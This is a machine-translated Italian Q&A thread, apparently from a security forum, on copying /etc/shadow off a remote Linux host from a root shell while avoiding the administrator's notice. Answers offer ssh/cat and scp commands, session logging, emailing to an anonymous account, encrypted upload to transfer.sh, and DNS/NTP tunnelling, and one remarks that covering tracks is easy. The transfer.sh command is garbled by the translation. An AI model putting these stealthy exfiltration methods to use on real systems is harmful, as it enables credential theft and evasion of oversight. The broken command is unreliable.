Metodi per copiare file da un sistema Linux remoto per ordine di rilevabilità (presupponendo shell remota con root privleges)

1

Sono connesso a una VM remota per la pratica del pentesting. Ho una shell con i privilegi di root su quel sistema e voglio sapere come posso ottenere una copia del contenuto di / etc / shadow sul mio computer locale per una visione successiva.

Supponendo che non sia stato rilevato fino a quel punto, quali sono i metodi / programmi standard di Linux per ottenere il contenuto di / etc / shadow, o qualche altro file, per ordine di rilevabilità per l'amministratore del sistema remoto?

Alcuni metodi sono stati suggeriti come cat + copy + paste, netcat e scp. Il gatto seguito da una copia e incolla sembra primitivo, disordinato e soggetto a errori. Netcat e scp sembrano meno inclini agli errori, ma sono titubante a utilizzarli perché sembrano più rumorosi e più tracciabili dato che devo inserire nel mio IP altre informazioni identificabili nella sessione shell remota.

    
posta Info5ek 17.09.2016 - 03:01
fonte

5 risposte

2

Perché non stai semplicemente loggando (localmente) tutto ciò che vedi e fai?

$ script hax0r
Script started, file is hax0r
$ ssh vuln@target
<vuln> elevate_privileges
# vi harmless_file
:e /etc/shadow
(browse through the file if it doesn't fit on one screen)
:q
# exit
<vuln> exit
$ exit
Script done, file is hax0r

I contenuti di shadow sono ora nel tuo file locale, hax0r . Puoi saltare alcuni passaggi (come provare a nascondere l'accesso ai file dalla cronologia della shell remota), se lo desideri. O usi qualche altro programma (forse la registrazione integrata del tuo terminale?) Per catturare la cronologia della tua shell locale.

Ovviamente puoi sempre:

$ ssh root@target cat /etc/shadow > remote_shadow

O semplicemente:

$ scp root@target:/etc/shadow local_shadow
    
risposta data 17.09.2016 - 07:18
fonte
1

Potresti provare a inviarlo via email a un account anonimo, a seconda di quali utilità di invio sono installate sul computer vittima.

    
risposta data 17.09.2016 - 04:43
fonte
1

con gpg e cURL, puoi rilasciare tarball cifrati su transfer.sh - utilizza SSL. %codice%. Puoi caricare anche con un oneliner. Vedi link . In ogni caso dovresti usare un binario tar -cf - /etc /root | gpg -c foo.mpg - statico compilato da casa, o qualcosa di equivalente.

    
risposta data 18.09.2016 - 12:13
fonte
1

Se nessuno ha rilevato la shell inversa di root, il metodo passa completamente sotto la copertina è in cat / etc / shadow nella sessione della shell e copia l'output nella finestra del terminale e lo incolla nella sessione della macchina attaccante.

    
risposta data 20.09.2016 - 20:14
fonte
0

Potresti provare a estrarre i dati attraverso un protocollo che non è sempre ben monitorato. Viene in mente il tunneling NTP e DNS, ma esistono anche tunnel per altri protocolli.

Immagino che la rilevabilità dipenda da quanto osservano da vicino qualcuno e da quali strumenti / sistemi stanno usando per rilevare l'esfiltrazione dei dati. Coprire le tue tracce non dovrebbe essere un problema dato che hai root.

Questo potrebbe essere di interesse: link

    
risposta data 20.09.2016 - 22:13
fonte

Leggi altre domande sui tag